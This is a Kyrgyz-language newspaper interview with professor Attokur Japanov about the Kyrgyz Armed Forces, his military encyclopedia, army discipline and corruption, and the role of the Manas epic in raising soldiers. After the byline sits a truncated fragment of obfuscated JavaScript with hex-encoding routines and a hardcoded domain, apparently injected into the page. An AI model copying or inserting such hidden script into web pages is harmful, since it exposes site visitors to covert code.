Аттокур ЖАПАНОВ, КРСУнун профессору: “Бизге булчуӊдары буркуйган аскерлер эмес,  акылы жетик жоокерлер керек”

29-май – КР Куралдуу күчтөрүнүн күнү!

adb2f2f5ff61bf10026e12843adb5c29

Улуу жердин кутун урпактарым уласын деп, ушул жерде жаратман жашоо курасын деп, Айкөл атабыз аруу канын төккөн, баатырларыбыз жүрөгүн берген жер – Кыргыз жери.

Ала-Тоону сактоо – актыкты, Теӊир-Тоону сактоо – теӊдикти, Пергананы сактоо – пейилди, кыргызды сактоо – кылымды сактоо деп кабылдап, Кыргыз Республикасынын Куралдуу күчтөрүнүн 24 жылдыгын утурлай армиябыздын, коопсуздугубуздун абалына, кыргыз жоокерлерине байланыштуу суроолорго жооп алуу үчүн КРСУнун профессору Аттокур ЖАПАНОВ агай менен маек курдук.

Аттокур Жапанов

– Агай, он эки томдук аскер энциклопедиясын түзүп чыгып элге сундуӊуз, алгач ушул энциклопедия тууралуу кыскача айтып берсеӊиз?

Энциклопедия негизинен республикабыздын жаш муундарына арналат жана аларды мекенчилдик, интернационалдык жактан тарбиялоого зор салым кошот. Аскердик институттардагы, гарнизондордогу, бөлүктөрдөгү аскерлерибиздин адептүүлүгүн, интеллектисин жогорулатат. Бул томдукта дүйнө жүзүнүн аскердик, согуштук тарыхы, өнөрлөрү, спорттук оюндары, Манас, Аттила, Барсбек аталарыбыздан тарта башка баатырларыбыздын дээрлик баардыгынын өмүр таржымалы камтылган. Жалпы жонунан бул энциклопедия кыргыздын башын бириктирип, эли-жерибизди коргогон баатырларды түбөлүккө эсибизге тутууга, эркиндигибиздин баасын билүүгө чакырык таштап турган эмгек болуп саналат десем болот.

– Аскер энциклопедиясын түзүп чыгуу менен бүгүн бизге кандай аскер керек экендигин аӊдадыӊыз?

Аскер энциклопедиясында да белгилегенимдей эле, бүгүн мекенди коргоо үчүн интеллектуалдык жактан өнүккөн аскерлерди тарбиялап-даярдоо эӊ башкы улуттук саясатка айланышы керек. Согуш жүргүзүү жана коргонуу аракеттеринин формасы өзгөргөнү менен мааниси ошол эле бойдон калды. Бүгүнкү муун менен Ата-Мекендик согуш убагындагы аталарыбызды жана жердештерибизди бир гана нерсе байланыштырат. Ал Ата-Журт жана эл үчүн болгон сүйүү сезими. Азыркы муун кыргыз эли жана жери үчүн болгон аталарыбыздын дымактуу сезимин, жалындаган от жүрөгүн, чынчылдыгын, берилгендигин, тайманбастыгын, эрктүүлүгүн, тазалыгын, айкөлдүгүн, кайраттуулугун жоготсок, эгер ушул салттык сезимдерди өзүбүздөн суутуп салсак, анда биз бул дүйнөгө бекер келдик.

– Кыргыз жоокери деген ким болгон?

Жоокер деген сөздүн өзү сонун. Жанын аябаган жоо алат дейт. Кыргыз жигити – бул жоокер. Ал чапчаӊ, жалтанбас болгон. Ал согушта дагы ар дайым алдыда турган. Коркоктор гана артта калган. Керек болсо кыргыздын кыздары да жоокер болгон. Анткени, согуш маалында алар жаа тартышкан. Жигиттердин артында тирек болушкан. Эгер жигиттер артка чегинип кача турган болсо, кыздар аларды намыстантып, шыктантышкан. Зарыл учурда жашы, карысы дебей жапырт согушка кирген. Кылымдарды карыткан кыргыз далай кырдаалдардан кемибей өткөн. Ушунун негизинде кыргызды Кудай сүйгөн эл деп айта алабыз. Негизи эле кыргыздын армиясы дүйнөдөгү эӊ бактылуу армия. Себеби, Казакстандын президенти Н.Назарбаевдин 1999-жылы басылган “В потоке времени” (“Тарих толкынында”) деген китебинде алгач арийлер, анан сактар, хундар, түрк, байыркы кыргыз, прокыргыз андан соӊ проказак болдук деп атаганындай эле, кыргыз армиясы дүйнөдөгү улуу империяларды курган, согуштук тактикаларды мыкты өздөштүргөн жоокер элдин учугун улоочулар жана улуу бабаларыбыз калтырган ыйык эл-жерибизди коргоочулар болуп саналат.

– Аскердик тартип, тарбия берүү деген эмне?

Тартип жана тарбия – өнүгүүнүн негизи. Аскерде, деги эле мамлекетте тартип, тарбия болмоюнча өнүгүү болбойт. А тартип алгач үй-бүлөдөн башталат. Андан соӊ тартип, тарбиянын булагы болуп китеп саналат. Качан гана биз бири-бирибизди ата-бабаларыбыздай аруу сезип жашаганда жана көргөн-укканыбыз тууралуу жакшы ойлогондо гана жолубуз ачылат, башыбыз оорубайт. Коом үчүн жоопкер экендигибизди аӊдамайын, баарыбыз балдарыбызды бирдиктүү тарбияламайын, балдарыбыз чөйрөнүн таасирине кирип кете берет. Ошондуктан тартип менен тарбияны аскерден берет деп күтпөстөн, талапты жалгыз гана армияга койбостон, ар бирибиз өз милдетибиз катары кабыл алышыбыз керек.

– Учурдагы жоокер, аскерлерибиздин абалын кандай баалайсыз?

Кыргызда өз агасын агалай албаган, бирөөнүн агасын сагалайт дейт. Мен өзүбүзгө жаман сөз тийгизгим келбейт. Ошондуктан, “марс” планетасында бир эл бар деп элестетели. Эгерде ошол элде “агалар” уурдагыч болсо, мамлекеттин, элдин акчаларын беш-алты киши өз билгениндей бөлүп, армияга бөлүнгөн каражаттарды жеп атса, ал эми ушуга чейин дүйнөдөгү эӊ байыркы, бактылуу армия ээси болуп эсептелген эл дагы да болсо өзүнүн армиясына берилип, ишенип жашагандыктан армиясына деп каржы берип, мамлекетке салык төлөп турса, бирок ал каражаттарды баягы беш-алтоо өзүм билемдикке салса, ал эми ишеним артып аскерге жөнөткөн балдар ачка жүрсө, ар кимдин ишин кылса, жөнү жок тепки жесе, анда андан өткөн төмөн армия болушу мүмкүнбү!? А кыргыздын армиясы андай болот деп ишенгим келбейт. Анткени, ордо оюнун ойлоп тапкан, согуштук стратегияларды мыкты иштеп чыга алган, эч качан багынбаган армия кыргыздыкы гана. Ошондуктан кыргыз катышкан кандай гана согуш болбосун, ал жерде кыргыз тарап гана жеӊишке жетет. Буга мисал катары кечээки эле Панфилов дивизиясын, Чолпонбайды алсак болот. Кыргыз армиясындагы командирлер алдындагыларга кам көрөт, сабабайт, ортодогуну уурдабайт деп мен да ишенем.

– Ошондо, учурда армиябызга негизинен эмне жетпей жатат деп ойлойсуз?

Азыркы армияга жоокердик күч, дем, шыкак, дух, үлгү жетпей жатат. Мисалы, илгери эки тараптуу армия беттешээр алдында астыга эки баатыр чыкчу. Адегенде алар тарапташтарына сөз менен дем, күч берип, Ата Мекендин баасын түшүндүрүп, намысын арттырчу. Ошол дем менен кан майданга кирген эрлер сөзсүз жеӊишти камсыздашкан. Азыр дагы командирлер ошол баатырларча үлгү көрсөтө алса, аскерлер дагы үлгүлүү болушаар эле. Мен аскерлер менен жолуккан учурда дайыма аскерге карап, “сен командирди угушуӊ керек, анткени ал сенин атаӊдай”, ал эми командирге кайрылып, “бул аскер бирөөнүн баласы, азыр сенин балаӊдай, сен ага жооп бересиӊ, чекесине черте турган болсоӊ, анда сыйыӊдан кетесиӊ” деп эскертип айтам. Анткени, дем, дух жетпей турган маалда бири-бирибизге болгон жакшы мамилебиз, ишенимибиз бизди бийиктетип, биримдигибизди арттыра алат.

– Накта кыргыз жоокерин калыптандырууда тарыхтын, элдик оозеки чыгармачылыктын орду кандай?

Накта кыргыз жоокеринин бейнесин мен кыргызмын деген, Манас атабыздын бөлүкчөсү, учкуну жүрөгүндө калган гана кыргыз баласы түзө алат. Башка эч ким түзө албайт. Накта кыргыз жоокерин калыптандырууда ар бир кыргыз милдеттүү. Ал бешиктеги баланы тарбиялоодон башталат. Балдарга баатырдык жомокторду окуп берүүбүз зарыл. Жомок укпай чоӊойгон бала мыкаачы, мээримсиз болуп өсөт. Ошондуктан бала боорукер, мээримдүү болуп өсүшү үчүн жомок, дастан, элдик баяндарды көп угузуш керек. Бай тарыхыбызды даӊазалап окутуу чыныгы жоокерлерди калыптандырат. Аны биз үй-бүлөдөн, бала-бакчадан тарта билим берүүнүн баардык баскычында берүүбүз керек. Андыктан, ар бир ата-эне, мугалим бул талапты тереӊ түшүнө билүүсү шарт. Муну менен катар жоокерлер руханий-адептик жактан дагы мыкты тарбияланышы керек. Израилде армиясында аксакалдар “Талмутту” окутат. Ушул сындуу эле биздин армиянын ар бир бөлүгүндө “Манас” китептери турушу жана окутулушу керек. Манасты билбеген командир, Манасты билбеген аскер кыргыз жоокери, баатыры боло албайт. Аскерге урушуп тарбия бергендин ордуна, Манасты, баатырлар баяндарын окутуп, түшүндүрүп тарбия бере турган болсок алда канча таасирдүрөөк болмок.

– Келечекте элибизге кандай аскер керек?

Албетте азыр илгеркидей жоокерчилик заман эмес. Бүгүнкү согуш акылдын, маалыматтын согушу. Ошондуктан бизге булчуӊдары буркуйган “алп” денелүү аскерлер, командирлер эмес, акылы жетик, аң-сезими бийик интеллектуалдык жактан өскөн жоокерлер керек. Ошого жараша жаӊы замандын жетишкендиктерин колдоно билүүлөрү шарт. Келечекте башы иштеген армия гана жеӊишке жете алат. Анан сөзсүз түрдө бизге “жер тыңшаар маамыттар” керек. Ошол кулактар дүйнөдө, коӊшуда, душманда эмне болуп атканын учурунда угуп, чечим чыгарууга жардамчы болуп туруусу зарыл.

– Буюрса, 29-майда Куралдуу күчтөрдүн 24 жылдыгын белгилегени турабыз. Ушундан улам сизден мамлекеттик коопсуздугубуздун, коргонуубуздун, деги эле куралдуу күчтөрүбүздүн абалы кандай деген суроону сурагым келип жатат?

Кайрадан эле жанагы “марстагы” мамлекетти мисалга алалы. Ал мамлекеттин армиясындагы адамдардын айтуусуна караганда, аскерий унаасынын сырты бар, мотору жок, учагы бар, уча албайт имиш. Андай аскердик техникаларынын саны деле саналуу экен. Эгерде, Кыргызстаныбыздын абалы да ушундай боло турган болсо, анда абал өтө оор. Ал эми азыркыдай дүйнө эли жөнүн таба албай аткан кырдаалда, өзүбүздөн жаттар, ичибизден ийри жылаандар чыгууда. Коопсуздук актуалдуу болуп турганда элин алмаштырып, жерин саткандар болууда. Эл-жерибиз болсо эрендерибиз, жоокерлерибиз коргогон эӊ башкы байлык болгон. Эзелтен жерин сатуу энесин сатуудан да пас нерсе катары каралган. Чынында, жерин саткан адамдын тукумуна заӊ кетет. Алар каргышка калат, ошондуктан алардын урук-тукуму оӊолбойт. Ата-Мекенибизди коргоо, анын коопсуздугун сактоо – башкы милдетибиз. Ал үчүн баарыбыз жоопкербиз.

– Маанилүү маегиӊиз үчүн чоӊ ыракмат агай!

Чолпонбек КАПАРБЕК уулу

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *